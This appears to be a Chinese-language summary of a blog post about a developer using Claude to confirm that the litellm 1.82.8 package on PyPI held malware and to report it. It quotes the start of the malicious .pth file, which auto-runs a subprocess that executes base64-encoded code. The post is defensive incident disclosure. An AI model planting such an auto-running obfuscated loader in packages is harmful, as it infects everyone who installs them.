Callum McMahon 用 Claude 确认 LiteLLM 恶意软件攻击

深度Simon Willison2026年3月26日2 分钟阅读
Callum McMahon 向 PyPI 报告了 LiteLLM 恶意软件攻击。他分享了与 Claude 的对话记录,展示了如何确认漏洞并决定下一步行动。Claude 甚至在确认恶意代码后建议了 PyPI 的安全联系地址。

2026年3月26日,Callum McMahon 向 PyPI 报告了 LiteLLM 恶意软件攻击。他在 博客 中分享了与 Claude 的对话记录,这些记录帮助他确认了漏洞并决定如何处理。

Claude 在确认恶意代码存在于一个 Docker 容器后,甚至建议了 PyPI 的安全联系地址:

已确认。刚从 PyPI 下载的最新版本,在隔离的 Docker 容器中:

code
Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...

恶意的 litellm==1.82.8 目前在 PyPI 上活跃,任何安装或升级 litellm 的用户都会被感染。这需要立即报告给 security@pypi.org

我很高兴看到 Callum 使用了我的 claude-code-transcripts 工具来发布这次对话的记录。

本文编译自 My minute-by-minute response to the LiteLLM malware attack,版权归原作者所有。

觉得有用?分享给更多人

获取每周 AI 工具精选

工具推荐、实战教程和生态洞察,每周更新。

相关文章

Simon Willison 正在重构 LLM Python 库的抽象层,以支持服务器端工具执行等新功能。他利用 Claude Code 分析了四大 LLM 提供商的客户端库,生成了用于测试的 curl 命令和 JSON 输出。这些调研材料已开源,旨在帮助设计更通用的 API 抽象。

深度Simon Willison·4月5日·1 分钟

智能体技能——包含程序性知识和可执行资源的结构化包,供智能体在推理时动态加载——已成为增强 LLM 智能体的可靠机制。然而,推理时技能增强存在根本性限制:检索噪声引入无关指导,注入的技能内容带来大量 token 开销,而模型从未真正习得它所遵循的知识。我们提出一个问题:技能是否可以被内化到模型参数中,使其在无需任何运行时技能检索的情况下实现零样本自主行为?我们提出 Skill0,一个专为技能内化设计的上下文强化学习框架。Skill0 引入了一种训练时课程,从提供完整技能上下文开始,逐步撤除。技能按类别离线分组,并与交互历史一起渲染为紧凑的视觉上下文,教授模型工具调用和多轮任务完成。动态课程机制…

深度·4月5日·17 分钟

评论